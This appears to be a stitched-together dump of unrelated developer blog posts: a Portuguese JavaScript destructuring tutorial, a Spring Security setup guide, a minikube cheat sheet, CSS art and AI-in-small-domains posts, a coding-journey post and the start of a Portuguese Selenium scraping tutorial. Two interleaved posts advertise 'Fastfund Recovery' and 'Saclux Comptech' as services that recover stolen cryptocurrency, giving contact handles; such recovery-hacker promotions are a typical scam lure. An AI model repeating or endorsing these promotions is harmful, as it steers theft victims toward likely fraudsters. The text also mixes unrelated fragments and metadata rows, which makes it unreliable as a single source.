O operador spread (`...`) usa o mesmo sinal que o operador rest, mas é usado de maneira diferente. Enquanto o operador rest coleta elementos ou propriedades restantes, **o operador spread expande um objeto ou array.** Isso é especialmente útil para copiar e combinar objetos e arrays.
**Exemplo com Objeto:**
```jsx
const outroDono = { nomeDono: 'Pedro', idadeDono: 30 };
const cachorroComOutroDono = { ...Cachorro, dono: outroDono };
console.log(cachorroComOutroDono);
// { nome: 'Bob', raca: 'Vira-lata', idade: 5, dono: { nomeDono: 'Pedro', idadeDono: 30 } }
```
No exemplo acima:
- O objeto `Cachorro` é copiado usando o operador spread (`...Cachorro`), criando uma nova instância com todas as propriedades do objeto original.
- O novo objeto `cachorroComOutroDono` é então combinado com o objeto `outroDono`, onde a propriedade `dono` do objeto `Cachorro` é substituída pela propriedade `dono` do objeto `outroDono`.
**Exemplo com array:**
```jsx
const vogais = [a, e, i];
const consoantes = [b, c, d];
const letras = [...vogais, ...consoantes];
console.log(letras); // [a, e, i, b, c, d]
```
No exemplo acima o array `vogais` é expandido usando o operador spread (`...vogais`), e o mesmo é feito com o array `consoantes` . Ambos os arrays são combinados no novo array `letras`.
## Função com Desestruturação
Com a desestruturação em funções você pode desestruturar objetos diretamente nos parâmetros da função. Isso torna a função mais legível e clara, principalmente quando você está lidando com objetos complexos.
```jsx
function printCachorro({
nome,
raca,
idade,
dono: {
nomeDono,
idadeDono,
endereco: { rua, numero }
}
}) {
console.log(`Nome do Cachorro: ${nome}`);
console.log(`Raça: ${raca}`);
console.log(`Idade: ${idade}`);
console.log(`Nome do Dono: ${nomeDono}`);
console.log(`Idade do Dono: ${idadeDono}`);
console.log(`Rua: ${rua}`);
console.log(`Número: ${numero}`);
}
printCachorro(Cachorro);
```
Observe que na função `printCachorro`, em vez de acessar `Cachorro.nome`, `Cachorro.raca`, etc., você pode acessar `nome`, `raca`, etc., diretamente nos parâmetros. A função define seu parâmetro como um objeto com uma estrutura que corresponde ao objeto `Cachorro`. Isso possibilita extrair todas as propriedades necessárias diretamente quando a função é chamada.
Além disso, também podem ser definidos valores padrão para o caso das propriedades não estarem presentes no objeto passado para a função.
```jsx
function printCachorro({
nome = 'Desconhecido',
raca = 'Desconhecida',
idade = 0,
dono: {
nomeDono = 'Sem nome',
idadeDono = 0,
endereco: { rua = 'Sem rua', numero = 0 } = {}
} = {}
} = {}) {
console.log(`Nome do Cachorro: ${nome}`);
console.log(`Raça: ${raca}`);
console.log(`Idade: ${idade}`);
console.log(`Nome do Dono: ${nomeDono}`);
console.log(`Idade do Dono: ${idadeDono}`);
console.log(`Rua: ${rua}`);
console.log(`Número: ${numero}`);
}
printCachorro({});
```
No exemplo acima, mesmo se o objeto passado para a função estiver vazio ou faltar alguma propriedade, a função ainda funcionará corretamente por conta dos valores padrão.
Espero que este artigo tenha sido útil para você entender entender um pouco mais sobre a desestruturação em Javascript. Lembre-se de que utilizando da maneira correta, esse método pode agregar bastante no resultado final do seu trabalho.
Se você tiver algo a recomendar, feedbacks e etc., sinta-se à vontade para compartilhá-los nos comentários! Até logo, te vejo no próximo artigo!🖖🏽😄 | tassiomed |
1,879,552 | Spring Security Basics: Implementing Authentication and Authorization-PART 1 | Create the base application Before proceeding to the implementation of authentication and... | 0 | 2024-06-06T23:35:00 | https://dev.to/bytegrapher/spring-security-basics-implementing-authentication-and-authorization-part-1-3b91 | ## Create the base application
Before proceeding to the implementation of authentication and authorization , let's create a simple application to serve as a foundation. The application will have the following API end points.
1. `GET /api/hello`
2. `GET /api/protected`
3. `GET /api/admin`
Also a database software is required. Here the setup uses **PostgreSQL** database. You are free to choose yours.
>Don't forget to create a database named <code>spring_access_db</code> in your favorite database tool.
Let's go through the following steps to build the foundation.
1. Create the project
2. Implement the API end points
3. Create user and role entities
4. Create user and role repositories
5. Configure database connectivity
6. Populate database with sample users
7. Run the application
8. Verify users and roles are created by querying the database
9. Try accessing the API end points
### Create the project
To create the project go to [https://start.spring.io/](https://start.spring.io/) and create the sample project with the following dependencies.
* **Spring Web**
* **Spring Data JPA**
* **PostgreSQL Driver**
> If you are using <strong><em>IntelliJ IDEA Ultimate</em></strong> or <strong><em>Visual Studio Code</em></strong> you can create the project within the IDE.
>Create project with IntelliJ IDEA Ultimate : <a target="_blank" rel="noopener noreferrer nofollow" href="https://www.jetbrains.com/help/idea/your-first-spring-application.html" style="pointer-events: none">Click here for doc</a>
>Create project with Visual Studio Code: <a target="_blank" rel="noopener noreferrer nofollow" href="https://code.visualstudio.com/docs/java/java-spring-boot" style="pointer-events: none">Click here for doc
Here I used the Spring initializer and opened the project in IntelliJ IDEA (Community Edition)

1. Add the dependencies
2. Fill up the project metadata
3. Generate the Zip file and extract it.
4. Then open it in your IDE.
### Implement the API end points
Create a class named **ApiController** and implement the APIs there.
* **ApiController.java**
```java
package com.gintophilip.springauth.controller;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
@RequestMapping("/api")
public class ApiController {
@GetMapping("/hello")
public ResponseEntity<String> hello() {
return ResponseEntity.ok("Hello");
}
@GetMapping("/protected")
public ResponseEntity<String> protectedResource() {
String message = """
This is a protected resource <br>
You are seeing this because you are an authenticated user
""";
return ResponseEntity.ok(message);
}
@GetMapping("/admin")
public ResponseEntity<String> admin() {
String message = "Hello Admin";
return ResponseEntity.ok(message);
}
}
```
### Create user and role entities
Create two classes for modeling the user and role entities.
**ApplicationUser.java**
```java
package com.gintophilip.springauth.entities;
import jakarta.persistence.*;
@Entity
public class ApplicationUser {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String firstName;
private String lastName;
@Column(unique = true)
private String email;
private String password;
@ManyToOne
@JoinTable(name = "user_roles")
private Roles role;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getFirstName() {
return firstName;
}
public void setFirstName(String firstName) {
this.firstName = firstName;
}
public String getLastName() {
return lastName;
}
public void setLastName(String lastName) {
this.lastName = lastName;
}
public String getEmail() {
return email;
}
public void setEmail(String email) {
this.email = email;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public Roles getRole() {
return role;
}
public void setRole(Roles role) {
this.role = role;
}
}
```
**Roles.java**
```java
package com.gintophilip.springauth.entities;
import jakarta.persistence.*;
@Entity
public class Roles {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
@Column(unique = true)
private String roleName;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getRoleName() {
return roleName;
}
public void setRoleName(String roleName) {
this.roleName = roleName;
}
}
```
### Create user and role repositories
**UserRepository.java**
```java
package com.gintophilip.springauth.repository;
import com.gintophilip.springauth.entities.ApplicationUser;
import org.springframework.data.jpa.repository.JpaRepository;
public interface UserRepository extends JpaRepository<ApplicationUser,Long> {
ApplicationUser findByEmail(String email);
}
```
**RoleRepository.java**
```java
package com.gintophilip.springauth.repository;
import com.gintophilip.springauth.entities.Roles;
import org.springframework.data.jpa.repository.JpaRepository;
public interface RoleRepository extends JpaRepository<Roles,Long> {
}
```
### Configure database connectivity
Let's configure the connection to the database named `spring_access_db` with the following settings:
username: **postgres**
password: **12345**
For configuring the database connectivity update the **application.properties** file as follows.
```plaintext
spring.datasource.url=jdbc:postgresql://localhost:5432/spring_access_db
spring.datasource.username=postgres
spring.datasource.password=12345
spring.jpa.properties.hibernate.dialect = org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto = update
```
>If you are using a different database, please ensure that the connection URL is updated to correspond with your specific database. also the hibernate dialect
### Populate database with sample users
Let's Create a class which implements the `CommandLineRunner` interface. The method `run` will be executed once the application is ready.
**DatabaseUtilityRunner.java**
```java
package com.gintophilip.springauth;
import com.gintophilip.springauth.entities.ApplicationUser;
import com.gintophilip.springauth.entities.Roles;
import com.gintophilip.springauth.repository.RoleRepository;
import com.gintophilip.springauth.repository.UserRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.stereotype.Component;
@Component
public class DataBaseUtilityRunner implements CommandLineRunner {
@Autowired
UserRepository usersRepository;
@Autowired
RoleRepository rolesRepository;
@Override
public void run(String... args) throws Exception {
try {
Roles userRole = new Roles();
userRole.setRoleName("USER");
Roles adminRole = new Roles();
adminRole.setRoleName("ADMIN");
rolesRepository.save(userRole);
rolesRepository.save(adminRole);
ApplicationUser user1 = new ApplicationUser();
user1.setFirstName("John");
user1.setEmail("john@test.com");
user1.setPassword("123456");
user1.setRole(userRole);
ApplicationUser adminUser = new ApplicationUser();
adminUser.setFirstName("sam");
adminUser.setEmail("sam@test.com");
adminUser.setPassword("12345");
adminUser.setRole(adminRole);
usersRepository.save(user1);
usersRepository.save(adminUser);
}catch (Exception exception){
}
}
}
```
### Verify users and roles are created by querying the database
As a result of the previous step three tables will be created with the provided data in the database `spring_access_db`;
Here I use the psql CLI client to view and query the database.
**List of tables**
```bash
spring_access_db-# \dt
List of relations
Schema | Name | Type | Owner
--------+------------------+-------+----------
public | application_user | table | postgres
public | roles | table | postgres
public | user_roles | table | postgres
(3 rows)
```
**Table: application\_user**
**Query**: `select * from application_user;`
```bash
spring_access_db=# select * from application_user;
id | email | first_name | last_name | password
----+---------------+------------+-----------+----------
1 | john@test.com | John | | 123456
2 | sam@test.com | sam | | 12345
(2 rows)
```
In this example, the password is stored in clear text. In a real-world scenario, it is essential to store passwords in an encrypted form rather than as plain text. We'll do this later.
**Table: roles**
**Query:**`select * from roles;`
```bash
spring_access_db=# select * from roles;
id | role_name
-----+-----------
802 | USER
803 | ADMIN
(2 rows)
```
**Table: user\_roles**
**Query:**`select * from user_roles;`
```bash
spring_access_db=# select * from user_roles;
role_id | id
---------+----
802 | 1
803 | 2
(2 rows)
```
### Run the application
Now run the application. Once it is up and running, open the browser and try to access the API endpoints.
1. [http://localhost:8080/api/hello](http://localhost:8080/api/hello)
2. [http://localhost:8080/api/protected](http://localhost:8080/api/protected)
3. [http://localhost:8080/api/admin](http://localhost:8080/api/admin)
You will be able to access all the APIs without any restrictions. This completes the setup of base application.
In the comings steps we'll see how to protect these end points by integrating authentication and authorization mechanisms using Spring Security.
--- | bytegrapher | |
1,879,734 | [Game of Purpose] Day 19 | Today I spent my evening programming other stuff, so no progress :/ | 27,434 | 2024-06-06T23:31:15 | https://dev.to/humberd/game-of-purpose-day-19-36g1 | gamedev | Today I spent my evening programming other stuff, so no progress :/ | humberd |
1,879,544 | Spring Security Basics: Implementing Authentication and Authorization | Hello everyone, this document will guide you through the process of integrating authentication and... | 0 | 2024-06-06T23:30:00 | https://blog.gintophilip.com/series/spring-security-authentication-and-authorization | beginners, java, springboot, springsecurity | Hello everyone, this document will guide you through the process of integrating authentication and authorization mechanisms into a Spring Boot web application using Spring Security. The following topics will be covered:.
1. ### PART 1: Create the base application.
1. Create the project.
2. Implement the API end points.
3. Create user and role entities.
4. Create user and role repositories.
5. Configure database connectivity.
6. Populate database with sample users.
7. Verify users and roles are created by querying the database.
8. Run the application.
2. ### PART 2: Enable Spring Security
1. Add the Spring Security dependency
2. Restart the application
3. Verify Spring Security is enabled
3. ### PART 3: Configuring security of the API end points
1. Create the security configuration class
2. Make all APIs to be accessed only by logged in users
3. Allow /api/hello to be accessed by anyone
4. Restrict access to /api/admin to user with ADMIN role only
4. ### PART 4: Integrate the database with Spring Security.
1. Add the password encoder bean.
2. Update the plain text password to encrypted password.
3. Configure user details service.
4. Configure the authentication provider.
Before going in let's see what is,
* Authentication
* Authorization
* User details service
* Authentication provider
### Authentication
Authentication is the process of proving that someone is who they claim to be. The authentication can be done via certain ways such as Username and password, fingerprint. token etc...
To authenticate against an application, a user must have valid credentials. When these credentials are provided to the application for access, the application verifies them against the database where the credentials are stored. If the credentials match, the authentication is successful and the user can proceed to use the application.
### Authorization.
While authentication verifies the identity of a user in an application, authorization determines what actions the user is permitted to perform. This means it addresses the permissions assigned to a user.
In an application, there may be multiple users, each with different levels of operational rights. For example, an ADMIN user may have the right to delete a user, whereas a regular user will not have this capability.
A basic flow of user authentication and authorization
**Authentication**

1. User submits the credentials to the application.
2. The application verifies the credentials by checking in the database.
3. If the credentials are valid allow access to the application.
**Authorization**

1. User requests a resource.
2. The authorization module checks if the user has rights to access the resource.
3. If user has rights the resource is given to the user.
4. Else the access to resource is denied.
### **User details service**
This service provides the necessary data, such as username, password, or other details required for authentication. In Spring Security, we configure a `UserDetailsService` object, which instructs Spring Security on where to load the required data for authentication. For example, when a username is provided as "test@test.com," Spring Security needs to look up the user data where the username is "test@test.com." This lookup is typically performed on a database. The database required for this lookup is configured using the user details service.
In essence, the user details service is a service that retrieves user data from the database based on a given key.
### **Authentication provider**
The authentication provider is responsible for authenticating users based on the provided credentials.
The authentication provider requests the user's details from the user details service using the received username. The user details service fetches and returns the user information if a user with the requested name is found. Then, it proceeds to compare the password.
The authentication provider and the user details service collaborate to authenticate a user effectively.
https://blog.gintophilip.com/series/spring-security-authentication-and-authorization
--- | bytegrapher |
1,877,475 | Pride Month | This is a submission for Frontend Challenge v24.04.17, CSS Art: June. Inspiration For the... | 0 | 2024-06-06T23:08:18 | https://dev.to/gabrielliosc/pride-month-44a3 | frontendchallenge, devchallenge, css, pride | _This is a submission for [Frontend Challenge v24.04.17](https://dev.to/challenges/frontend-2024-05-29), CSS Art: June._
## Inspiration
For the June frontend challenge, I got inspired by the celebration of diversity once it's the pride month.
## Demo


Link to the repository: https://github.com/gabrielliosc/CSS-Art-June
Demo: https://gabrielliosc.github.io/CSS-Art-June/
## Journey
To add the confetti effect I used an open-source library called tsparticles, to see its code you can check here:https://github.com/tsparticles/tsparticles
The rainbow was really interesting to create, the stripes and animation were challenging. I enjoyed a lot to work at this project and also to be able to participate on this contest.
### License
MIT License
Copyright (c) 2024 Gabrielli Olvieira
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | gabrielliosc |
893,130 | The Basics of Minikube | What is Minikube? Minikube is a simple to use local virtual environment (and simple shell)... | 0 | 2021-11-09T17:58:24 | https://dev.to/newfront/the-basics-of-minikube-3b8c | kubernetes, tooling, cheatsheet | ## What is Minikube?
[Minikube](https://minikube.sigs.k8s.io/docs/start/) is a simple to use *local virtual environment* (and simple `shell`) that runs a small, dedicated [Kubernetes](https://kubernetes.io/) cluster locally on (Mac/Windows/Linux).

Figure 1-1. Minikube Local Environment
Installation instructions are [available online](https://minikube.sigs.k8s.io/docs/start/), or you can use `brew install minikube`, if you are running on MacOS.
## The Basics
Once installed there are only a small handful of commands needed to operate minikube effectively. The following commands can be run in your terminal of choice.
## minikube start
Simply spins up a local single-node Kubernetes cluster and downloads and installs any additional dependencies on your behalf.
```
minikube start
```
By default, the minikube virtual machine starts up with 2 (CPU) cores and 2gb of (RAM) memory. There are many options that allow you to customize your installation and specify how the K8s cluster will operate. For example, you can choose the version of K8s, the total memory to allocate to the virtual machine, as well as the number of cpu cores.
**Customizing the Minikube Virtual Machine**
```
minikube start \
--kubernetes-version v1.21.2 \
--memory 16g \
--cpus 4 \
--disk-size 80g
```
When you are ready to stop working, you can choose to keep the virtual machine running and simply `pause` the processes within the k8s cluster, or you can choose to fully `stop` the cluster and reclaim your system resources.
## minikube pause
Pause is a novel concept in minikube. Rather than fully shutting down your cluster, you can choose to pause (freeze) specific resources (governed by namespaces) or pause everything that is running. Pausing specific resources for example like local Kafka or Redis can help when you need to see how your applications will act when a service is lost.
Pause all Pods
```
minikube pause -A
```
Pause Specific Pods
```
minikube pause -n kafka,redis
```
## minikube unpause
Any containers paused at a prior point in time can be unpaused.
```
minikube unpause -n kafka, redis
```
Using `pause` and `unpause` can be a life saver if you have limited local system resources, and as an added benefit provides you with a simple mechanism to return to a specific environment setup, like for example how `docker compose` is used to spin up specific runtime environments as a slice over Docker. Given Kubernetes maintains the state of the processes running within it, minikube simply snapshots things and frees up your cluster resources (within the virtual machine) when you no longer need to run a specific set of Pods and Containers.
## minikube stop
When you decide you want to simply stop everything and shutdown the physical virtual machine just use the stop command.
```
minikube stop
```
That concludes the quick tour of the minikube basics. Come back here if you need to revisit any of the basic commands.
> Note: `minikube delete` can be used to clear everything but deleting the underlying virtual machine. Use this with caution since any changes made to the underlying K8s node (minikube node) will be wiped out as well.
Enjoy. | newfront |
1,849,842 | Getting Started with SSR | Hey guys, recently, I've been exploring Next.js which is framework that is built on top of react to... | 23,487 | 2024-06-06T23:00:00 | https://dev.to/devlawrence/getting-started-with-ssr-123j | webdev, nextjs, beginners, javascript | Hey guys, recently, I've been exploring Next.js which is framework that is built on top of react to streamline web application development, and I've come across a technique it uses for rendering web pages. It's quite distinct from the familiar client-side rendering (CSR) approach that many of us are accustomed to. This technique is known as Server-Side Rendering (SSR).
In this article, we'll delve into what SSR entails, how it differs from CSR, and uncover other intriguing aspects. Let’s dive right 😉
## What is SSR?
Server-side rendering (SSR) is a technique in web development where the web page is generated on the server before being sent to the user's browser. This means that the initial content of the page is already rendered and ready to be displayed when the user requests it.
Here's a breakdown of SSR in the context of **Next.js:**
- When a user visits a Next.js page by making an http request, the server executes the necessary code to generate the complete HTML content for that page because it does page splitting by default. This includes the initial data and markup.
- The generated HTML is then sent to the user's browser.
- Once the browser receives the HTML, it can immediately render the content without having to wait for any additional JavaScript to be downloaded and executed.
This approach offers several advantages such as:
- **Improved SEO:** Search engines can easily crawl and index the content of SSR-rendered pages, which can boost your website's search ranking.
- **Faster initial load times:** Since the initial HTML is already generated, users see the content of the page almost instantly, leading to a better perceived performance.
- **Enhanced user experience:** Users don't have to wait for JavaScript to load before they can interact with the page.
So what sets it apart from client-side rendering? They both seem to render right away, right?
## Difference between CSR and SSR
You're correct that both Server-Side Rendering (SSR) and client-side rendering (CSR), the default method in React, can provide an immediate rendering experience for users. However, there's a key difference in when the rendering happens 👇🏽
- In SSR (with Next.js), the server renders the initial HTML on the server, including the data needed for the page. This HTML is then sent to the browser, resulting in a faster initial load time because the content is already there.
- In CSR (normal React), the browser receives an empty HTML shell and then fetches the necessary JavaScript code to render the page content. This can lead to a slight delay( before the user sees the content, especially on slower connections.
Here is an analogy to differentiate the two
- Imagine SSR as getting a pre-made meal at a restaurant. You receive your food instantly, and then the chef prepares any additional dishes you ordered.
- On the other hand, CSR is like ordering a custom meal. The chef needs to cook everything from scratch, so it takes a bit longer to get your food.
## Considerations for SSR with Next.js
Here are two additional things to keep in mind about SSR with Next.js
1. **Data fetching:** SSR is great for SEO and initial load times, but it can add some overhead to your server since it needs to generate the HTML for each request. To optimize this, Next.js offers techniques like `getStaticProps` and `getServerSideProps` for fetching data efficiently on the server-side.
2. **Not ideal for highly dynamic content:** SSR is less suitable for web applications with constant updates or user interactions that heavily rely on JavaScript. In these cases, client-side rendering or a hybrid approach might be more appropriate.
## Understanding `getStaticProps` and `getServerSideProps`
In Next.js, `getStaticProps` and `getServerSideProps` are functions specifically designed for data fetching on the server-side, addressing the potential drawbacks of SSR that we talked about earlier. Here's a breakdown of what they are and the difference between them 👇🏽
- **`getStaticProps`:** This is a function that is ideal for pre-rendering data at build time. It's perfect for content that doesn't update frequently, like blog posts or product pages. The fetched data is directly included in the static HTML, resulting in super-fast load times and excellent SEO since search engines can easily index the content. Here is an example 👇🏽
```jsx
function HomePage({ data }) {
return (
<div>
<h1>Home Page</h1>
<p>Data fetched at build time: {data}</p>
</div>
);
}
export async function getStaticProps() {
// Simulate fetching data at build time
const data = "This data was fetched at build time.";
return {
props: {
data,
},
};
}
export default HomePage;
```
Here is what is going on from the code above 👇🏽
- We have a simple home page component (**`HomePage`**) that receives some data as a prop.
- We use **`getStaticProps`** to fetch data at build time. Here, we're simulating fetching data synchronously.
- The fetched data is passed to the **`HomePage`** component as props.
- **`getServerSideProps`:** This is a function that fetches data on the server-side just before a page is rendered for each request. It's a good choice for content that needs to be dynamic or personalized based on the user, like shopping carts or user profiles. While it might add a slight delay compared to `getStaticProps`, it ensures the data is always up-to-date. Here is an example 👇🏽
```jsx
function AboutPage({ data }) {
return (
<div>
<h1>About Page</h1>
<p>Data fetched on each request: {data}</p>
</div>
);
}
export async function getServerSideProps() {
// Simulate fetching data on each request
const data = "This data is fetched on each request.";
return {
props: {
data,
},
};
}
export default AboutPage;
```
Here is what is going on from the code above 👇🏽
- We also have a simple about page component (**`AboutPage`**) that receives some data as a prop.
- We use **`getServerSideProps`** to fetch data on each request. Here, we're simulating fetching data synchronously.
- The fetched data is passed to the **`AboutPage`** component as props.
💡 *I hope you get a basic idea on how `getStaticProps` and* **`getServerSideProps`** *works now*
These examples are quite basic and demonstrate the fundamental usage of **`getStaticProps`** and **`getServerSideProps`**. But in real-world scenarios, you would typically use these functions to fetch data from external sources like APIs or databases.
## Conclusion
Thank you for reaching the end of the article! 🎉 I hope you found it informative and insightful. If you have any questions or contributions, feel free to leave them in the comments section below. Wishing you an amazing weekend! 😀 | devlawrence |
1,879,728 | Day 965 : Learning | liner notes: Professional : Whew...today. Had a couple of meetings to start off the day. Started... | 0 | 2024-06-06T22:52:56 | https://dev.to/dwane/day-965-learning-c34 | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Whew...today. Had a couple of meetings to start off the day. Started working on my project. Took a look at the community board and went down a rabbit hole helping a person. Helped them get it working, but realized the day was basically over.
- Personal : Went through Bandcamp and picked some projects that I'll pick up later. Worked on my side project, looked at some land and went to sleep.

Going to purchase tracks on Bandcamp and get put together some social media posts. Oh, and I got the slide show component for my side project "working". Need to do some refinement, but it's working. Think I'm going to do a quick detour to make a demo to explore some technology that I've been learning about and want to use in a future side project. Looks like it's going to rain. Let me get started on my night.
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube G8IVcyTNs80 %} | dwane |
1,879,727 | i love gacha :) | gacha #gachalife | 0 | 2024-06-06T22:29:00 | https://dev.to/ilikealanlikeslay/i-love-gacha--4c6d | gacha, gachalife | #gacha #gachalife
 | ilikealanlikeslay |
1,879,726 | Can you really hire a professional hacker to retrieve stolen crypto? Where do you find one? Consult Fastfund Recovery. | Unless you've been living under a virtual rock, you've probably heard about the boom in... | 0 | 2024-06-06T22:28:55 | https://dev.to/george_clinton_b1f10f7156/can-you-really-hire-a-professional-hacker-to-retrieve-stolen-crypto-where-do-you-find-one-consult-fastfund-recovery-32if | webdev, javascript, programming, productivity | Unless you've been living under a virtual rock, you've probably heard about the boom in cryptocurrency, especially Bitcoin. This digital currency has taken the world by storm, offering a decentralized and secure way to transact without intermediaries like banks. With its skyrocketing value and promises of financial autonomy, it's no wonder Bitcoin has attracted millions of investors. But where there's money, thieves lurk in the shadows, ready to pounce on unsuspecting victims. Bitcoin theft has become a pressing issue in the cryptocurrency world, leaving many investors devastated and wondering if there's any hope of recovering their stolen funds. Fortunately, a glimmer of hope shines through the darkness in the form of Fastfund Recovery. Fastfund Recovery is enlightened in the Bitcoin world and can help you recover your stolen Bitcoin. Email: Fastfundrecovery8 (at) gmail dot com
Tele,gram: fastfundsrecovery
Signal: 18075007554 | george_clinton_b1f10f7156 |
1,879,675 | AI Excels in Small Domains | When it comes to AI, the average user often thinks of large language models like ChatGPT or Claude AI... | 0 | 2024-06-06T21:40:44 | https://dev.to/max_prehoda_9cb09ea7c8d07/ai-excels-in-small-domains-50gi | When it comes to AI, the average user often thinks of large language models like ChatGPT or Claude AI that are trained on vast amounts of data across a wide range of domains. While these models are incredibly impressive in their ability to engage in open-ended conversations and tackle a variety of tasks, they can sometimes struggle with hallucinations or inconsistencies when dealing with highly specific or niche topics.
This is where AI trained on smaller, focused domains truly shines. By narrowing the scope of training data to a specific area, such as CSS animations and transitions, AI models can become extremely proficient and efficient at generating accurate and creative solutions within that domain. The limited syntax and well-defined rules of CSS animations make it an ideal candidate for AI specialization.
I recently had the opportunity to put this concept to the test by building an AI model specifically trained on CSS animations and transitions. Initially, I experimented with the Claude API and found that it performed quite well in generating animations. However, the real magic happened when I switched to a self-trained AI model running locally. The results were very impressive.
The locally trained AI model demonstrated an incredible ability to generate complex and visually stunning CSS animations with ease. It had a deep understanding of the syntax, timing functions, and various properties involved in creating smooth and engaging animations. The model's outputs were not only technically accurate but also showcased a level of creativity and innovation that surpassed my expectations.
The new model is going live today @ [aicssanimations.com](https://www.aicssanimations.com/)
Try it out for yourself and feel free to give feedback! | max_prehoda_9cb09ea7c8d07 | |
1,879,685 | Breaking Free from Tutorial Hell: My Journey to Becoming a Web Developer | Hello World! I've been coding, or I should say trying to code, for the past two years. Despite my... | 0 | 2024-06-06T22:15:40 | https://dev.to/aniiketpal/breaking-free-from-tutorial-hell-my-journey-to-becoming-a-web-developer-3889 | webdev, javascript, beginners, productivity | Hello World! I've been coding, or I should say trying to code, for the past two years. Despite my efforts, I still don't know how to make fully functional websites (though I can create simple ones). I've been stuck in what many call "tutorial hell" for a long time. This means I've spent countless hours watching tutorial videos and copying code, only to find myself unable to write the code independently. It has been a frustrating experience, and I've often wondered why I can't seem to progress.
Recently, I've had a realization: the key to learning how to code effectively is to build projects and learn through hands-on experience, rather than just passively watching videos. So, I've decided to restart my coding journey. This time, I'm not starting from scratch because I already have a grasp of the basics. However, my approach will be different. I will primarily rely on documentation to guide me, and I'll turn to YouTube only when absolutely necessary. I won't waste hours watching videos that don't contribute to my understanding.
My goal is to secure a job or internship within the next 4-6 months by creating projects that teach me how to develop scalable products. Through these projects, I hope to gain practical experience and deepen my knowledge. Who knows, I might even end up creating my own SaaS product while working on these projects 😎. Along the way, I will make an effort to share my learnings with the community as much as I can, hoping that my journey can inspire and help others who are in a similar situation. | aniiketpal |
1,879,683 | Saclux Comptech Specialst can come through for you when it comes to Digital Currency recovery | My Name is Julianne, I was devastated when I lost 2 BTC to a phishing scam. But thanks to the... | 0 | 2024-06-06T22:01:32 | https://dev.to/julianne_theresa_c3ffa29c/saclux-comptech-specialst-can-come-through-for-you-when-it-comes-to-digital-currency-recovery-355c | My Name is Julianne,
I was devastated when I lost 2 BTC to a phishing scam. But thanks to the expertise of SACLUX COMPTECH SPECIALST and their team, I was able to recover 95% of my stolen Bitcoin! Their cutting-edge technology and innovative methods made the impossible possible.
If you're a victim of cryptocurrency theft, don't lose hope! I highly recommend talk2us@sacluxcomptechspecialst.com and their team for their exceptional service and expertise in recovering DIGITAL CURRENCY. Their dedication, professionalism, and success rate are unmatched. Don't hesitate to reach out to them for help. They are the real deal! Contact info:
Telegram: SacluxComptechTeam
Website: https://sacluxcomptechspecialst.com/ | julianne_theresa_c3ffa29c | |
1,879,673 | Obtendo Dados do WhoScored: Projeto de Web Scraping com Selenium | Há algum tempo, escrevi um post no dev.to sobre Web Scraping com Python, BeautifulSoup e Requests.... | 0 | 2024-06-06T22:01:22 | https://dev.to/lisandramelo/obtendo-dados-do-whoscored-projeto-de-web-scraping-com-selenium-4538 | python, selenium, webscraping, beautifulsoup | Há algum tempo, escrevi um [post no dev.to sobre Web Scraping com Python, BeautifulSoup e Requests](https://dev.to/lisandramelo/extracting-data-from-transfermarkt-an-introduction-to-webscraping-2i1c). Embora esse post ofereça uma base sobre o processo de raspagem de dados na maioria dos websites, em alguns casos, essa abordagem não é suficiente. Alguns sites são configurados para evitar o acesso automatizado para raspagem de dados. Em geral, os websites buscam evitar robôs que podem causar sobrecargas nos servidores e usuários que podem obter informações e usá-las sem o devido crédito.
Apesar dessas proteções, o uso de ferramentas de automações em sites podem ser essencial para a criação de soluções de automação, testes e análise de dados de aplicações web. Por isso, aprender sobre essas ferramentas é fundamental para o desenvolvimento, teste e análise de websites com proteções anti-crawlers.
Neste tutorial, vamos explorar como utilizar o Selenium para acessar e extrair dados de websites que possuem mecanismos de proteção mais avançados. O Selenium é ferramenta para automação de navegadores que pode simular a interação humana com páginas web, permitindo contornar algumas restrições impostas a scripts tradicionais de web scraping.
## Requisitos e Instalação de Bibliotecas
Antes de começar a produzir o código em si, teremos de garantir que temos todas as ferramentas necessárias. Dessa forma, garanta que você possua os seguintes requisitos:
- [Python instalado em sua máquina](https://www.python.org/downloads/);
- Biblioteca Selenium para Python;
- Biblioteca BeautifulSoup para Python;
- Biblioteca Pandas para Python;
- WebDriver de navegador.
### Instalação de Ferramentas Necessárias
#### Instalação Selenium
A biblioteca Selenium para Python é uma ferramenta para automatizar interações com navegadores web. O Selenium permite que você escreva scripts em Python que exijam ações em um navegador, como clicar em botões, preencher formulários, navegar entre páginas e extrair dados de sites com proteções anti-crawlers.
Para instalar a biblioteca do [Selenium](https://pypi.org/project/selenium/), você pode usar o [pip](https://pypi.org/project/pip/).
```bash
pip install selenium
```
#### Instalação BeautifulSoup
A biblioteca BeautifulSoup é uma ferramenta para extrair dados de arquivos HTML e XML. Ela torna a navegação, a busca e a modificação de documentos HTML e XML simples e eficaz.
Para instalar a biblioteca do [BeautifulSoup](https://pypi.org/project/beautifulsoup4/), você também pode usar o [pip](https://pypi.org/project/pip/).
```bash
